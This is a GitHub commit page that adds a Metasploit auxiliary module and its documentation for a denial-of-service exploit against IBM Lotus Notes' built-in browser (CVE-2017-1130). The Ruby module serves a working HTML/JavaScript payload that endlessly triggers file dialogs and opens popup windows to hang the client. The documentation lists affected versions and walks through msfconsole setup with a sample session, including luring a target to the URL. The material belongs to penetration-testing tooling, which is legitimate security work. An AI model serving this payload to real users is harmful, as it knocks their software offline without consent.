-
Notifications
You must be signed in to change notification settings - Fork 13.9k
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
Land #9060, IBM Lotus Notes DoS (CVE-2017-1130).
- Loading branch information
Showing
2 changed files
with
137 additions
and
0 deletions.
There are no files selected for viewing
67 changes: 67 additions & 0 deletions
67
documentation/modules/auxiliary/dos/http/ibm_lotus_notes2.md
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,67 @@ | ||
| ## Vulnerable Application | ||
| This module exploits a vulnerability in the built-in web-browser of IBM Lotus Notes client application. | ||
|
|
||
| If a user is persuaded to click on a malicious link, it would open up many file select dialog boxes which, | ||
| would cause the client hang and have to be restarted. | ||
|
|
||
| Affected Products and Versions | ||
|
|
||
| IBM Notes 9.0.1 to 9.0.1 FP8 IF1 | ||
| IBM Notes 9.0 to 9.0 IF4. | ||
| IBM Notes 8.5.3 to 8.5.3 FP6 IF13. | ||
| IBM Notes 8.5.2 to 8.5.2 FP4 IF3. | ||
| IBM Notes 8.5.1. to 8.5.1 FP5 IF5. | ||
| IBM Notes 8.5 release | ||
|
|
||
| Related security bulletin from IBM: http://www-01.ibm.com/support/docview.wss?uid=swg21999384 | ||
|
|
||
| ## Verification | ||
|
|
||
| Start msfconsole | ||
|
|
||
| `use auxiliary/dos/http/ibm_lotus_notes2.rb` | ||
|
|
||
| Set `SRVHOST` | ||
|
|
||
| Set `SRVPORT` | ||
|
|
||
| run (Server started) | ||
| Visit server URL in the built-in web-browser of IBM Notes client application | ||
|
|
||
| ## Scenarios | ||
|
|
||
| ``` | ||
| msf > use auxiliary/dos/http/ibm_lotus_notes2 | ||
| msf auxiliary(ibm_lotus_notes2) > show options | ||
| Module options (auxiliary/dos/http/ibm_lotus_notes2): | ||
| Name Current Setting Required Description | ||
| ---- --------------- -------- ----------- | ||
| SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0 | ||
| SRVPORT 8080 yes The local port to listen on. | ||
| SSL false no Negotiate SSL for incoming connections | ||
| SSLCert no Path to a custom SSL certificate (default is randomly generated) | ||
| URIPATH no The URI to use for this exploit (default is random) | ||
| Auxiliary action: | ||
| Name Description | ||
| ---- ----------- | ||
| WebServer | ||
| msf auxiliary(ibm_lotus_notes2) > set SRVHOST 192.168.0.50 | ||
| SRVHOST => 192.168.0.50 | ||
| msf auxiliary(ibm_lotus_notes2) > set SRVPORT 9092 | ||
| SRVPORT => 9092 | ||
| msf auxiliary(ibm_lotus_notes2) > run | ||
| [*] Auxiliary module execution completed | ||
| msf auxiliary(ibm_lotus_notes2) > | ||
| [*] Using URL: http://192.168.0.50:9092/mypath | ||
| [*] Server started. | ||
| msf auxiliary(ibm_lotus_notes2) > | ||
| ``` | ||
|
|
||
| At this point, the target should use the built-in web browser of their IBM Lotus Notes client to navigate to the above "Using URL" value. And then they should see their Notes app become unresponsive. |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,70 @@ | ||
| ## | ||
| # This module requires Metasploit: https://metasploit.com/download | ||
| # Current source: https://github.com/rapid7/metasploit-framework | ||
| ## | ||
|
|
||
| class MetasploitModule < Msf::Auxiliary | ||
| include Msf::Exploit::Remote::HttpServer | ||
|
|
||
| def initialize(info = {}) | ||
| super( | ||
| update_info( | ||
| info, | ||
| 'Name' => "IBM Notes Denial Of Service", | ||
| 'Description' => %q( | ||
| This module exploits a vulnerability in the native browser that comes with IBM Lotus Notes. | ||
| If successful, the browser will crash after viewing the webpage. | ||
| ), | ||
| 'License' => MSF_LICENSE, | ||
| 'Author' => [ | ||
| 'Dhiraj Mishra', | ||
| ], | ||
| 'References' => [ | ||
| ['EDB', '42604'], | ||
| [ 'CVE', '2017-1130' ] | ||
| ], | ||
| 'DisclosureDate' => 'Aug 31 2017', | ||
| 'Actions' => [[ 'WebServer' ]], | ||
| 'PassiveActions' => [ 'WebServer' ], | ||
| 'DefaultAction' => 'WebServer' | ||
| ) | ||
| ) | ||
| end | ||
|
|
||
| def run | ||
| exploit # start http server | ||
| end | ||
|
|
||
| def setup | ||
| @html = %| | ||
| <html><body> | ||
| <input type="file" id="f"> | ||
| <script> | ||
| var w; | ||
| var kins = {}; | ||
| var i = 1; | ||
| f.click(); | ||
| setInterval("f.click()", 1); | ||
| setInterval(function(){ | ||
| for (var k in kins) { | ||
| if (kins[k] && kins[k].status === undefined) { | ||
| kins[k].close(); | ||
| delete kins[k]; | ||
| } | ||
| } | ||
| w = open('data:text/html,<input type="file" id="f"><script>f.click();setInterval("f.click()", 1);<\\/script>'); | ||
| if (w) { | ||
| kins[i] = w; | ||
| i++; | ||
| } | ||
| }, 1); | ||
| </script> | ||
| </body></html> | ||
| | | ||
| end | ||
|
|
||
| def on_request_uri(cli, _request) | ||
| print_status('Sending response') | ||
| send_response(cli, @html) | ||
| end | ||
| end |